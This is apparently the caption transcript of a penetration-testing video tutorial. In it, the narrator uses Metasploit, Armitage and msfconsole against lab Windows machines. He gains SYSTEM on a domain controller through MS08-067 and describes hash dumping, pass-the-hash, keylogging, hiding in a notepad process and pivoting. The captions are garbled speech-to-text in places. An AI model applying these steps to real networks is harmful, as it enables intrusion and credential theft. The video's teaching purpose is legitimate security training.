How-to Penetration Testing and Exploiting with Metasploit + Armitage + msfconsole

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

hey guys welcome to another episode of net sec now today we're going to get into discussing exploitation the third phase of the phases of network security and penetration testing so let's start off with the disclaimer any information disclosed in the series is provided for the sole purpose of learning network security we take no responsibility for any misuse of any information we provide we only suggest you audit the systems you have permission on or otherwise in your lab moving forward so the phases of penetration testing right we went through it the first phase was information gathering doing the homework we made a video on that so if you haven't seen that go ahead and check that out first the second video we made was the Recon stage building a case and of course again if you haven't seen these videos guys go on the YouTube channel and check them out today we're going to be discussing as I said the access and exploitation bombs away phase some of the things we're going to be using we'll get into here in just a minute so let's talk about the types of different attacks for exploitation there's a remote attack a client-side attack a blindside attack social engineering attack a fuzzing and denial of service attack and men in the middle attacks so you might be asking yourself why so many different attacks well I'm going to explain just the top three here because that's what we're gonna actually be getting into today actually we'll be getting into the top two but I'm going to explain the blind side attack as well so the remote attack is basically you're trying to exploit services that are vulnerable that a remote service is something like you know NetBIOS or DNS or you know something to that effect a client-side attack on the other hand is something that you're trying to exploit client side wise a vulnerability in Java flash things like that and that kind of ties into the social engineering attack with like the social engineering toolkit which we will be making a whole separate video on as well so the blind site attack is an attack that I don't generally recommend using unless you are absolutely at the end of your rope and you are desperate to try to get in or you just want to make sure that you've covered all bases right so a blindside attack is basically firing everything in your tool kit at your target and hoping for something to allow you in okay blindside attacks are very very noisy blindside attacks you know Kenko system damage you know downtime or you know server system crashes things like that so I don't generally recommend that unless it's a last-ditch effort to try to get in to your clients Network okay so let's go ahead and talk about some of the tools that we're going to be using in this episode we're going to be using Metasploit and Armitage Armitage being the front-end GUI version for Metasploit now Armitage is very limited in some aspects I've actually recently if you've been following us on Facebook I posted on that I found a bug inside of Armitage when you're using PS exec and pass the hash attacks it actually will work but it doesn't show that target system as being compromised inside of Armitage however if you emulate and do the exact same thing in MSF console which is the command line version of working with Metasploit you will actually see that it does in fact open a second meterpreter session and you know it does work so we're going to be learning also MSF console because it's really good to have the core fundamental understanding of how Metasploit actually works and again if you run into bugs with Armitage or something you're just not sure is working correctly you can always go back to MSF console and then you could do it in there and see if in fact it does or does not work the old school manual compile and fire basically we're not going to get into that today I try to stay away from that that's mostly if you find private exploits that haven't been made public yet you know really you got to trust the person you're downloading the script from and then you have to compile it so if you can't read the code of whatever they whatever language they wrote it in you're kind of taking a crapshoot and whether or not it's actually bad for your system as well as maybe utilizing some sort of attack for the remote assistive remote system so social engineering toolkit we're going to actually make a video separately based upon just the social engineering toolkit or otherwise known as set inside Kali Linux cobalt strike you know that's looks like it's made by the same guy Ralphy on Mudge that Mays made armitage but it's a paid version it is quite expensive we went over that in the past so we're really actually not going to be getting into that are using that even though I believe there's a 14-day free trial on this website you know we're not going to get into Usenet so denial of service attacks guys you're probably never going to use that against your clients when you're doing this professionally there is rare occasions where you might find a vulnerability where it requires you to fuzz or denial a service attack one service or part of a service to get around whatever protections in place and gain the actual access or information you're looking for albeit very rare very rare Google finding vulnerability feed side stare sites like security focus and nsns IT and is Teague of things like that we actually have one on our website learn net set comm on the front page there on the bottom right so also there's various other tools miscellaneous tools in Kali that you might be using you know really it depends on what type of audit you're doing each client is going to be different it's never going to be a set standard of hey well this works every time so I'm going to use this every time you know in talking about exploits and things like that so there's miscellaneous tools for information gathering stuff like that which we've went over in the other videos so we're going to fire up our Kali Linux box here okay so in the last video we showed you how to use open boss NBT scan you know and some other tools inside there today we're going to be using Metasploit norma taj and then we're going to be doing MSF console if I can fit that into this video if not I will make a separate video just based upon MSF console it is pretty intense to get used to the syntax of commands and how they work so that might be in a separate video depends on how long this one runs so we'll start off with Metasploit norma taj because that's the easiest to gather okay so the first thing is first our network has changed a little bit since the last video IP addresses may have changed things like that so you want to go ahead and do an NB T scan again you want to do an nmap scan again and then I'll show you how to import your nmap scans and stuff like that inside of Armitage so I've already went ahead and done the end map scans and the NBT scans to find out what the alive hosts were so we're going to go ahead and actually fire up Armitage right now so you go to the applications menu go to the Kali Linux sub menu and then down towards system services go to Metasploit and then community Pro start now if you haven't already you have to register for the free serial key for the community version just go ahead and do that we have actually mentioned that in the video of setting up Metasploit Norma Tasha please go back and reference that video and check it out so the reason why we do it this way is a little bit easier than you know starting a bunch of services as you can see here it starts three services in particular all right so the next step is just to enter in the command Armitage and hit enter so that's going to start the the Armitage front end the first dialogue box you're going to be presented with is actually the login box to get to the database to connect to the database the Postgres SQL database and actually come up here in just a second there we go so just go ahead and click connect everything should be fine there in terms of username password it's going to ask if you want to start the RPC server go ahead and click yes don't worry about this connecting to localhost five five five five three connection refuse connection refuse it's actually just trying to establish its connection it may take a minute maybe 30 seconds but eventually it will start Armitage as a service and over times I believe is written in Java so you know with Java you know that there is some lag inside the application itself and there we go it says connecting to database and it's going to go ahead and start Armitage as a front-end so I'm probably going to have to clear out our database here because I was doing some testing when I found the bug inside Armitage so I just want to start fresh with you guys so I'll go ahead and do that here in just a second as soon as it comes up to clear a database at any time guys just go to the host menu at the very top here and just go down to clear database and I'll show you how to do that in msf console as well and just click yes okay so basically we want to start fresh with importing our nmap scan and I'll show you how to do that now there's a couple of different ways that you can actually import hosts into Armitage and I'll show you how for a type here click hosts now you can go to import host which is what you would do if you were importing something from like nmap or you know some other scan you did you can go to add hosts which pops up a box you can add one host per line I don't really recommend that unless you're scanning just one particular IP address but I don't actually ever use that the other option you can do here is an nmap scan now Metasploit itself has an nmap module built into it right I prefer to do my nmap scan separate because if I need to do a specialized type of scan at least I can specify that in the command line parameter flags but in here you could actually choose intense scan intense scan plus UDP intense scan all TCP ports it can be quite a bit slower when you do an or massage so be aware of that so if you want to go ahead and just do an intense scan it's going to ask you to enter in your IP address or range so if you had one single IP address if you were doing a remote audit you would go ahead and just enter in the when I address of your client if you were doing an internal audit here of course you can go ahead and enter in your IP address range 192 168 1 dot 0 slash 24 and you can enter that in here I'm actually going to cancel out of this if you also notice that sometimes when you open up dialog boxes there is no cancel or you know close button on some of them just right-click on it and go to close ok so we're going to go ahead and import our nmap scan alright guys so as I said let's go ahead and import our scan here so in order to do that you have to go up to hosts import hosts now if you remember in the last video we try to keep an organizational structure going and we put our over clients information scans etc into their own folder right so if we remember correctly that was an acne ink so just simply go to navigate in there and my fresh scan that I did since the network has changed it's been fresh - scan dot XML so just go ahead and highlight that and click open you can see here on the bottom there's a console and then each task that you do opens up another tab so in fact this one is called import because we're importing now if you notice it'll tell you that it's successfully imported the fresh gained XML okay now you can see here it kind of looks cluttered because everything's stacked on top of each other right so we just go to Auto layout right click in the empty space here go to auto layout click none then go to layout and just click stack that's the one I like best alright so let's pick apart some of the information that's imported here so obviously I did a range scan or cidr scan in nmap as we did in last video so dot one dot one I know is the router so in order to make things a little bit simpler to understand I'm going to go ahead and right-click on this one and just go to host and remove host as I don't want to waste time scanning things that I don't you know want to scan so once that happens here now again like I said Armitage is a little bit slow okay so 1.3 I believe is my machine here and let's just double check that yeah 1.3 is this machine here and I have no interest in scanning my host machine that I'm doing these videos office so I'm just going to go ahead and remove this one here as well ok so now we have three hosts alright if you highlight over each one of them and just run your mouse over it's going to tell you what it is so 1.2 says is what Microsoft Windows 7 and if you highlight over this one here it says Microsoft Windows 2000 well I know there's not a 2000 box up on there so then you highlight over this one it says Microsoft Windows XP but that's pretty vague right it didn't really give us too much information I want to know what service packs are in there I want to know you know all that good stuff and while nmap will generally tell us that the import feature and armitage seems not to transfer all that information over ok so in order to do that I want to do all three hosts at once and there's another scan in armitage called MSF scan now this is part of the auxilary part of the scanners which we will explore a little bit in MSF console so you go to host here and then MSF scans it's going to do a more detailed host based analysis of what the Machine actually is now you can also go to nmap scan and quick scan os detect but that may or may not work correctly so in order to do that you just left click anywhere and drag the imaginary box here the highlighted blue box over all three hosts sometimes all three hosts do not have the green box around them so just try to do it again there we go so now all three hosts are selected and I want to go to host MSF scans and you can see it automatically populates the IP addresses that I'm looking to scan I'm just going to click OK now this can take a few minutes guys because it's scanning all these different ports for services that are running on them so on and so forth it's going to try to guess the operating system more directly and try to make a better accurate determination of the operating system again you can achieve these same results in nmap but if you're going to use Armitage which I don't really use it very often but if you're going to use it it does help to have as much detailed information in it as possible so you can see here now it's running through auxilary scanners and this is down here what you'll see an MSF console when you go to set and use different things now you can see that the one that said Windows 2000 is actually changed and it says Microsoft Windows XP service pack 3 now you can see that this one here if you highlight over it says Windows Microsoft Windows 2003 service pack 0 what that one was reporting is XP before and this one was reporting as Windows 2000 right so now we got a clear picture of what we're actually working with here now I know 1.9 is statically set for that Windows 2003 standard edition server in our VM box our proxmox virtual machine host server okay so this Windows 7 1 or Windows 7 1 has not changed so that's good alright so now we got our host in here we know exactly what we're looking at if at any time you want to right-click on any one of these and go to services to see what services are going you can go ahead and do that so you can see here on 1.9 we got DNS running on port 53 and it will try to do a banner grab rudimentary better grab and tell you what's running on it we have port 80 open on there as well microsoft iis 6.0 port 88 scarborough security or server time port 135 is Windows RPC then we look at 139 well that's NetBIOS LDAP is running on it SMB which is four four five now when you're doing an audit and if you're like early in the network and you know we'll get into that in post exploitation and in our advanced series as well but port 445 is a dangerous port to have open unfortunately there's not too much you can do about that and when your local on a network okay there's a lot of exploits that work on that port for these older versions of Windows like 2003 server Windows XP and even sometimes Windows 7 so then you have que password windows RPC over HTTP and then tcp wraps okay so if you wanted to find out what services are running on this Windows XP machine same thing right click on it go to services and you can see this one's really just running one thirty nine four four five so it's just NetBIOS stuff okay windows seven same thing now if you notice every time you do a task it opens up another tab down here now this can get really confusing and really annoying when you have you know maybe 20 tabs open or something like that so if you find the information you're looking for as you're going through you know you can uncheck or or delete you know some of these tabs by just clicking the X up here so we know we imported our stuff ready we don't need that anymore and we know we did our scan already so we don't need that tab anymore so now we just have our services open for each of three boxes so now you might be asking yourself well that's all great but you know what are we going to get into the exploitation well here's where we come into it so if you remember correctly we did a in the last video in the recon stage we did the open us scan open vas scan whatever you call it now if you remember looking in that PDF there were some ports open and some services and some warnings and things like that so that you use that as a reference guide to try to build your case against what exploit you want to fire at what machine now keep in mind the way that Metasploit works and the way that Armitage works is that you know it kind of goes by what port is open in what service is running on that port so while we may have port 445 open over here on on the server it may be patched already against that vulnerability right so you have to keep that in mind that if an exploit doesn't work right away it may be patched they may have done their Windows updates but you know a majority of the time they don't do system-wide updates across the whole entire network or you know maybe they're doing the updates but a machine failed and they have no idea that the machine failed to do the update for whatever reason so you can find a vulnerable target now again you don't want to just go off and blindly fire everything now what I'm going to talking about the blindside attack in terms of using Armitage to do something like that you have to go to attacks and in Hail Mary and what that means is basically it's going to fire everything in the exploit database at that target system okay it's very noisy it can cause systems to crash and you definitely don't want to do that to your client right okay so the first things first you want to find attacks on a machine so you want to find what's vulnerable right so if you just highlighted one machine here and just go to attacks find attacks it's going to go ahead and query all the exploits in a database according to the services and ports that are running here and it's going to try to determine maybe what exploit could be you know used for that port in that service now you can see here when it says attack analysis complete you will now see an attack menu attached to each how each host in the targets window so click OK so if you right click now on the host you can go to attack and it's going to list a bunch of different things so there's an MS o3o 2060 com HTTP this is a bug inside Armitage that I've let Ralphie I'll know about in the past hasn't been fixed yet for whatever reason you can't have something like if you went to let's say let's go to dce/rpc exploit there's some exploits that support a check function and what it does is doesn't actually fire the exploit against the target where does the checked it checks the target to see if it's vulnerable to that specific exploit at in hand and then this menu only has one but if you went down to I is you can see that it has three or four of them all right four of them so if you hit check exploits on this it's going to run each exploit itself and try to use the check function now you'll see some of them here say this exploit does not support check so some exploits that were built and verified and put into Metasploit do not support a check function so unfortunately on some of those you're going to have to manually fire them and just see but we're looking for stuff that says you know this target is vulnerable or this work is is is exploitable so you can see on this one here the is MSO 307 ntdll web web Dave module it did do the check and it says the target is not exploitable so we know that right off the top there the MS o 3 if we went to attack and in is so the MSO 307 we're not going to use right we know that right off the bat then this one here is MS ADC says the target is not exploitable so again if we went to attack and in iis and then down here we know that it's not vulnerable to that one so there are ones that said like I said exploit does not support check well the iis web dave upload a s or underscore asp so let's go ahead and try to fire that one right so attack iis and then the is web dave if that's the correct one yes so let's go ahead and click that to fire this exploit now this is actually going to really push the exploit towards the target and see okay so once you do that it opens up a dialog box here and it gives you some options now not every exploit gives you these options some have options automatically picked for you by default you are to change whatever you'd like so targets automatic I usually leave that in automatic sometimes it has other options here which we will see later on where you can choose specific operating system or service to target this one is automatic I try to leave it on that if it has that because it will run through it automatically and try it now in order to what using a reverse connection what that means basically is that you whatever payload it's going to use to send to the target once the exploit has passed and then it comes back to us to pick up the payload we can try to use a reverse connection like a reverse tcp reverse dns or a bind tcp bind dns and things like that and we will get into that when we're using msf console it will show you the differences you also have an option here is called show Advanced Options and if you check that now our option menu has changed before we get into changing any options let's go ahead and take a look at the very top here if you if you read this it says this module can be used it just gives you a brief overview of what this exploits actually about this module can be used to execute a payload on iis servers that have the world writable directories the payload is uploaded as an ASP script using a web Dave put request ok pretty simple pretty straightforward l host is your localhost which is your machine that you're you're attacking from right so I know that this is the IP address of my Kali Linux box and I can simply go ahead and find that out here by just issuing the ifconfig command right so this is our IP address so we know that that's correct once minimize this ok so l port you can leave this or you can change it if you want to change any of these options under the value or the right-hand tab here you can do that let me just close this out here restart this again Armitage is a little bit buggy so sometimes you have to kind of do things twice ok so the L port you can see has changed if we wanted to change this you right you left-click on it once to highlight it in blue and then on the right-hand panel here you left-click it again sometimes you have to do it two or three times until you have a cursor in the box as you can see so if I want to change this to you know dot one are 25 721 I could but I'm just going to leave it at default you could change the path if you wanted to I don't recommend doing that proxies now you could use proxy chains to do this however inside Armitage it is a little bit buggy to use proxies when we get into MSF console I will show you how to set global proxies to use proxy chains and proxy chains is something we've discussed over a couple of videos and so you know applying that to using Metasploit with that you can actually set up like an SSH pivot or a pivot through machines things like that you can use proxies to attack from so on and so forth our hosts obviously is remote host and that's the target machine that we're after and of course I was automatically selected because that's the machine that we're targeting our port is 80 you can leave this unless I is is running on another port like 8080 or something like that you would change it in here again doing that V host you don't have to really worry about V host on most of these and show Advanced Options again you can change the domain name now we should have known that you know if you did like an MBT scan or something like that or even the nmap scan it's going to tell you what domain it's actually running on alright so if we wanted to do that you could alright but you should have this knowledge at hand first we end you know before anything so I'm actually going to change this option here workstation and I'm going to name this to the domain that it's working on so it's Acme Inc dot local ok so there's other different options you can change in here I really don't generally change most of this stuff I kind of just leave it the way it is unless of course we're using proxies but again I don't really use professionally armitage very much so I'm going to always want to try for a reverse connection right because I don't really want to try a bind attack I want to try a reverse connection so let's go ahead and check that and click Launch as you can see here it opens up another tab and exploit tab and it says exploit running is background job started reverse handler on the IP address of our machine here okay uploading the bytes to whatever text file it's creating here upload failed 403 forbidden so that means that it doesn't have the it's not really vulnerable because it doesn't have the post option as we saw in the description of the actual exploit it doesn't have post enabled on that on that specific service ok so that exploit pretty much failed ok so the other thing you could do if you notice that you have a vulnerability that's been known to work on this specific service pack so on and so forth that you know you're pretty confident is going to work like an MS o 8 o 67 for instance you can always search for that in this box now let's say you went to open boss and you did your scan and you were like hey it's vulnerable to MS o 8 o 67 but instead of going through the attack menu here and trying to find each one of those you know MS o 867 you know so and so forth you can actually always search for it in here MS o 8 and it'll bring up anything that starts with MS o 8 right so you can see that MS o8 o 67 is down here there's an MS o 8 o 78 so on and so forth right and this is all browser-based stuff and you can see the directory tree is auxilary exploit and that's pretty much it that comes up in MS o 8 but if you erase this you can see that there's four directories in here auxilary which is going to be most of your scanners fuzzers things like that and brute force attackers exploits going to be where your exploits are actually loaded into and your payload directory is going to be where your payloads are into so if you expanded this in the payload directory you can see that it has a bunch of different sub directories in there as well so if we were working with this Windows machine here we can go through here we can use there's a add user payload the meterpreter is the really popular one that most people use and you can see and here if we just move this menu over a little bit there is a bunch of different things in here bind IP version 6 TCP bye know NX tcp bind tcp reverse tcp reverse HTTP I mean there's there's a bunch of different stuff in here right reverse TCP DNS all that good stuff alright so those are all your mature Pater's sub shells in here and these are all of your windows payloads as well okay so if we went into the post directory again you can go under windows and you can go under the various now post is for like post exploitation which we are going to get into that in the next video so again let's not get too ahead of ourselves here let's go ahead and say that MSO 8 o 67 under attack and if we went to SMB MS o 8 o 67 well let's go ahead and check all the exploits here because we want to know which ones are actually going to work which ones aren't so we're not guessing in wasting time let's go ahead and do that oh here we go so we can see and we'll just wait here for the results to come by because the screen Scrolls pretty fast and again some of them don't support check guys so you really gonna have to just manually fire that one off at them okay so let's scroll up here the very first one I tried was MSO 8 o 67 net API very common very popular in Windows XP Windows 2000 Windows 2003 server world ok there was patches for it in various service packs Microsoft Windows XP was vulnerable way up to service pack 3 and an additional couple of updates to actually patch that so anytime it says the target is vulnerable well we know that we can fire that exploit against the target and confidence that it's more than likely 9 at 10 times going to work ok now there is some false negatives and positives that you know are reported back like with any other tool so we scrolling down here we notice the rest of them don't support check but we know that ones vulnerable let's go ahead and actually fire that one off so right click on it go to attack and then and the menus are kind of a little finicky when you when you're putting your mouse on it so sometimes you have to do it twice so go back down to SMB and you can see that it says and we'll be getting through this in the MSF console part of this use Windows SMB MSO 800 67 now that's what you would do in MS MSF console right click go to attack again SMB and then choose MSO 8 o 67 net API because we know that that one according to the check option is vulnerable let's go ahead and click on that so let's just read briefly what the actual description of this exploit is says this module exploits a parsing flow on the path conical ization code of net API 32 DLL well sometimes in these descriptions will tell us what the targets are that are actually vulnerable so reading down here a little bit the correct target must be used to prevent the server service along with the dozen others in the same process from crashing Windows XP targets seem to handle multiple successful exploitation events but 2003 targets will often crash or hang on subsequent attempts so you pretty much on Windows 2003 server you only get one shot at this right so you have to make a count if for something some reason you set something wrong something gets messed up that's what it might crash and then when you try to run the exploit again it might not be vulnerable to it okay so my crash at service so it's just giving you a heads up to you know watch out for that this is just the first version of module a full support for NX bypass on 2003 with all other platforms still in development okay so again l host is us l port would just leave that our host is fine the our port is fine and again you can see now when we click on targets now we have a bunch of different types of targets in here we're just going to leave this on automatic targeting and I want to do a reverse connection because it is available so I'm going to go ahead and click launch here you can see that it's actually exporting and it's given your fingerprint and here we go when it starts to say sending stage down here in the in the console menu you know that you're pretty much going to get that box okay and then it says meterpreter session 1 open for and it gives you the options now you have a meterpreter shell command line here and we're going to get into that an MSF console as well the beautiful thing about Armitage is it gives you the graphical user bells and whistles interface to say hey look this targets compromised ok so you can see that once the targets compromised it a monitor picture up here turns red has lightning bolts through it and all that good stuff so now the information underneath that says we're running this exploit you know completed and it's running as system so we were like god on that machine right now and since that's a domain controller that's horrible news for them but great news for us right so we basically just took down their main you know server and now we have system level access to that which is great because now we don't have to escalate privileges and you know go through all that nonsense so right clicking on here you now see a new option inside of the menu and it's meterpreter one and if you open a second you know exploit on this would be meterpreter to meterpreter 3 so on and so forth now this will get into in post exploitation but just to give you a brief overview because i feel important to have that before we you know precursor into the next video if you go through the submenu here of meterpreter one you have access you can migrate your process we don't have to use we're system already but if you wanted to you could you might grade it by default to notepad.exe so if mr. sysadmin is looking in on that specific computer for whatever reason the server in this case he's not going to see that you know while we're firing commands and doing tasks on that machine that you know the system service is hammered to death right and it's not maxing out the CPU so if we were doing it on notepad that's less suspicious like oh well the notepad process just got stuck and he's probably not going to kill it anyway so scrolling through here you've got escalate privileges now again we're at a system so we're not going to you know escalate our privileges at all you have steal tokens dump hashes which we will be getting into this will dump all the usernames and passwords for the Windows domain controller and since we're on the Windows domain controller this is really really bad for them but really really good for us right because once we do that we have two options we can try to crack the you know the hashes and we'll get into that we would be using hash cat and John the Ripper and all that good stuff we could try to crack the hashes or we can use another attack called pass the hash with PS exec now the bug that I found in Armitage and I'm still trying to I'm going to make an actual video for Raphael so he understands what the heck I'm talking about because I posted it on a Facebook and he doesn't really he's saying that it works but we all know that it's not I mean it's pretty obvious anyway so you have two methods of doing that the lsat method and registry method either what you choose is going to work just fine so in doing past sessions you have interacts you can have a command shell on there the meterpreter shell which we already have down here towards the bottom you can do let's see desktop VNC it's going to open up a VNC server so you can actually look at our desktop and what they're doing however I don't recommend that usually because it will lag their machine a little bit they might know something's up anyway Explorer you can browse the file show the processes log keystrokes screen shot webcam shot and there's post modules pivoting we will get into that in the post exploitation basically pivoting means that you now take that one compromised host and you were running all of your additional attacks to the other hosts on the network through that compromised host so essentially you're furthering yourself away from being detected because everything if they had like host-based intrusion detection systems or host-based firewalls and stuff like that they're more than likely going to say hey it's cool because you're part of our local subnet we're not banning you from doing anything right so that's the reason behind pivoting okay you have an ARP scan which you would use probably to find out all the other live hosts on the network if you haven't already now this works great when you're doing a remote pen test and you find a server that's like you know I don't know out on the network has an open port for a webserver email server you wind up compromising that but you want to know how many more machines are behind that network you can go ahead and do an ARP scan and it will go ahead and try to find all the other available IP addresses and you also have the kill option here the kill menu here which basically kills your meterpreter session each time you compromise a host and you take screenshots or you know video of it or proof somehow or some other way it's always advised to kill the session after you are done because somebody could hijack your meterpreter session being the bad guy could hijack your meterpreter session and cause havoc for your customers so always kill your sessions as you're backing out one machine at a time kill your sessions okay so anyway now you have services again in scan again and host again and all that good stuff now we don't need to attack this one any further right because we've already got this host compromised we're in that's it and the story game over for this host so now one dot for this one here is our Windows XP service pack 3 well gee let's try to go to attack and let's go over to SMB because that's always such a fancy one to attack that service there and you can see MSO 8 o 67 is listed again m/s 1006 T 1 spool SS is listed again and we have a pass to hash option which again if we had the hash is already from the Windows server we would right click on this one here and go to pass the hash and of course in or module I said there's a bug and it will it will succeed but it won't show the host is compromised up here on the GUI screen anyway so let's go to this SMB and let's go ahead and go check all these exploits so you can see it's checking MSO 8 0 67 and while Ms o 8 o 67 said that Windows XP up to service pack 3 is vulnerable again as I said in the beginning it could be patched so it's just going off the port and the service that's running on that port it's not checking legitimately whether it is patched or not in this case on the MS o 867 I'm sorry it is checking that if it's patched or not and it's saying the target is not vulnerable I know that that machine automatically did some updates before I shut them off so I know that it was vulnerable at one time but the updates took care of that vulnerability right so again you may come into a mixed network where you find some targets you know there updates may have failed or maybe the sysadmin is just not doing updates on that specific machine for whatever reason there might be an update that conflicted with one of their level of business apps that are running on there or something like that so there are some times where you're going to find that sysadmin intentionally does not do updates on one machine and 9 out of 10 times guys or maybe 8 out of 10 times guys to be honest with you it's on Windows servers domain controllers for some reason they don't want to update it because they're afraid that it may break the OS which Windows updates let's face it have been known to do for ages will break the system and if it breaks their server guess what their whole network is down right so they don't want to break that so they're just not doing updates on that server bad news again for them good news for us ok so as you can see here went through all of its checks and it was quite a few here that didn't support check ms a-- 10 Oh 61 spoole ss did not support check so let's go ahead and because we know MSO 8 o 67 which we use to compromise the windows 2003 server here is not exploitable on this target machine here ok so let's go ahead and try to fire off the um s10 one I'll right-click on again and go to attack SMB ms1000 61 okay so let's go ahead and leave all this all these options in here good I want to use a reverse connection and I also want to show Advanced Options so scrolling down in here just to make sure everything is set up correctly and it looks like everything in here is good it doesn't give us a domain option to change that or workstation option to change that in reading the description it says the module exploits the RPC service impersonation vulnerability detailed in Microsoft bulletins ms/ms 10 Oh 61 by making specifical dce/rpc requests they start doc printer so spool SS it's against the printer service so it doesn't really tell us what what versions of Windows are actually exploitable to this so let's just go ahead and launch this and see if it'll actually work now you can see it's setting all of its options what you would be doing in you know MSF console which is pretty easy because you can set Global's in there so it makes things a little bit user easier for you so it says exploit failed no access to server responded with this error status access denied okay so guess what it wasn't vulnerable to that well we can check other vulnerabilities if we want on here but again this is where it's important to have your you know PDF export or whatever export you did from open boss to see if it did in fact find any vulnerabilities on that machine so this way you're not wasting an exorbitant amount of time trying each one of these individually or trying to do the check option which some of them may fail so you have to inherently do that manually in fire each one so you can see that there's an Oracle one there's a Samba one let's try the Oracle and just do check against it so we're not actually firing it says this target is not exploitable okay so we know that that that's out let's go ahead and even though Samba is probably not going to work for this let's go ahead and check exploits on that well it says it doesn't support checks so we got to manually go back and do that and actually fire this so reading in here you can sometimes determine whether or not it's worth your time to actually fire this exploit over at it is it worth the the fact of maybe being caught module exploits a command execution vulnerability in the sambar versions 3.0 point 20 through 3.0 point 25 rc3 when using a non default user name map script ok so it doesn't really tell us that what it's going against so we can really just go ahead and click show Advanced Options just make sure if there's anything that we might change that might change our or change our ability to actually exploit this and we could probably try to change the domain if you wanted to we'll just name this Acme Inc dot local which is what that domain controller or which that is part of the domain if you had user names and passwords you could try to put them in over here we don't have any user names passwords yet so let's just go ahead and click launch and you see exploit failed there's no it's not a vulnerable to that exploit all right so we basically try it almost all of them guys again using PS exec would use a pass the hash attack so you'd have to dump the hashes from the server or another compromised machine and try to pass those along the domain to the other workstations or servers in the domain now generally speaking when a Windows domain controller is on a network and everybody is connecting to that it uses LDAP and the back end of Active Directory to store usernames and passwords so you can authenticate to the actual domain controller and say hey yeah I'm part of the domain give me an IP address comedienne asking me shared folders give me you know actor directory access to certain things give me printers give me all that good stuff right so when you're using pass to hash you're basically dumping all those hashes that were in the domain controller and trying to pass it along to the workstations in hopes that the administrator which they normally do adds themselves to each machine so they can remote and fix things whatever or give the other local user different privileges so on and so forth so you want to try to pass the hash across that and it should compromise machine and you do have the option to set a payload like a reverse TCP meterpreter shell and that machine would in turn be compromised again we'll get into all this in post exploitation but I just want to touch on it so you guys know what you're looking at so obviously again we could see this dialog box here doesn't have a close option or any kind of minimized option so again right-click on it and just go to close so it looks like we're not getting access to this target just yet however if we use the pass to hash attack there is a chance that we can still get in now this is basically just a remote attack if we did a client-side attack where we couldn't get in remotely any other way like there was no other services that were vulnerable we might use a client-side attack and the client-side attack is using something like social engineering toolkit tricking a user to download payload or basically an exploit and the payload from us so that uses a little bit of social engineering as well let's move on to our windows 7 host again if you go to under the attack menu you can see here that it says MSO 300 26 decom well let's go ahead and click on that and let's read the description this is where it's going to come in handy ok so it gives us some operating systems that are vulnerable to this so this module can be exploit the English version of Windows NT 400 service pack 3-6 a Windows 2000 Windows XP and Windows 2003 on one request well we know this is a Windows 7 machine we're not really working with you know any of that stuff right and if you go down to your targets option that's the only options that are selected so we're not even going to bother firing that one because guess what it's probably not going to work so right-click a gun again go to attack so the dce/rpc is out oracle ah let's not worry about that one here samba this one here so now it has an MS o 8 o 67 but here's the thing guys if you went to here and you went to hosts since that's the only one that's selected and I'm sorry attacks and find attacks it's going to go ahead and query exploits for that as well so just to do that just to make sure that we're not missing anything here and doesn't look like we're missing anything okay so again MSO 8 o 67 if we click on that we know that that's only working for Windows XP and Windows 2003 so let's close that and it doesn't look like we really have any other thing on the way in now you can always double check what exploits are available for Windows 7 by searching online or something like that but again reference to your open boss PDF so opening up armitage again the other thing we could try to do on here besides the client side attack is again a passed a hash attack to see if we can log into this machine and compromise it once we do that if we opened up a meterpreter shell guess what we have access on that system right so we could take screenshots we could do key logs we can you know escalate privileges we can there's a whole myriad of stuff we'll get to in post exploitation but this just gives you a brief overview of how armitage actually works compromising one host now using the same knowledge we're going to try to compromise host inside of msf console alright guys so that pretty much takes care of vomit ah Sh we're going to get into MSF console quickly the first thing you need to know is you always need to go to the applications menu kali linux and in system services and start Metasploit community pros services since we've already used Armitage in the same video those services already started for us so simply to start MSF console just in a command line or in the terminal type in MSF console and hit enter and it may take about a minute or so to actually load it up the other thing worth noting is every time you use Metasploit you should probably do an update MSF update you don't have to be an Metasploit console to do that the MSF console you don't have to be in there to do that you can actually just issue that from a command line it'll do it for you so when you start it up you'll see here that it will tell you the version here on the bottom and how many exploits auxilary modules post modules payloads and coders and knops are in the database ok so I have an updated mine in a while because this is just the lab box here so and since we're working with older Windows machines I know it's going to be just fine so let me just clear this out here okay so there's a couple of things that you should know right off the bat okay first things first is you have to do if you wanted to use like the import function that we use in Armitage there's a couple of different ways to do that we want to import our nmap scan results so when you're in your MSF console if you ever need help just type in to health command and it's going to give you a list of options that you can use at the core to do things that you need to do so you can notice a couple things we're going to go over here is set and set G set is used to set parameters or options inside of a payload or an exploit or scanner so on and so forth set G is to set global parameters so if we're working with just one specific target IP address or range we can set that as a global parameter show always displays modules of a given type or all modules and we're going to get into that as well also you have a couple of things down here with DB export to export like a report type of deal which as I discussed is kind of cumbersome because it's there's no X XSL file for to be converted to an HTML document so that's something I'm working on writing like I said dbn map is the built in and map scanning module for that and then you have DB import which imports your scan results file from any other scanners specifically and map so in order to do the import we have to first check to make sure that there's nothing in our database if you notice in armitage first thing we did was clear our database out because we don't want to get that confused with something else that we might have been scanning before so and so forth so in order to do that you just have to type in hosts and hit enter now as you can see here I already have some stuff in here from doing some demonstrations a little while ago if you have stuff in there you want to clear it's just host tack D for delete you can delete in individual hosts by just typing in its IP address so for instance we just want to delete the 1.21 we just type in 1 i 2 1 6 8 dot 1 dot 2 and hit enter and it says it deleted one host down here at the bottom and the tell host it deleted and then if you issued the host command again we would see we only have in here to now I want to delete the whole database because I want to start fresh right so it's host tack D for delete all and it deletes two hosts the two hosts that were left over again if we type in host we can make sure that our database is actually clear okay let me clear the screen out here so we talked about learning how to use set G now set G sets global parameters for you to use so if you're working against one specific target IP or if you're doing an internal audit and you're working towards an entire subnet range or you know something like that you can always use the set G parameter we'll get to that here in just a minute first we want to do is the DB import because we want to import our nmap scan that we did before right so it's DB underscore import and the path through where the file actually resides so that's route and then that's acne Inc and then that was fresh scan dot dot XML so just hit enter after that and you can see that it's importing all of our hosts for us here now again we're going to have to go through and remove some of these hosts so to save a little bit of time because I know a couple of them are you know like 1.1 is a router again and 1.3 is this machine that we're working off of here okay so let's clear this out now let's go ahead and issue the host command again you can see now that it's imported all of our hosts however as I said it's not reading correctly on the operating system and as before we know 1.9 is actually a Windows 2003 box so it didn't really import it correctly in terms of the os name or any kind of service packs or things like that all right so first things first I'm going to remove the host that we're not going to scan so I'm just going to host SD 192.168.1.1 and I'm going to do the same thing for dot 3 and then I'm just going to issue the host command again alright so now we have our three target machines in here so the thing is that you want to do what we did in Armitage and use the MSF scan to better enumerate the operating systems and the service packs available to them so those are actually located in the directory structure and I'm going to put a link in the description to learn everything there is to learn about MSF console so you guys have a diet or a reference to go 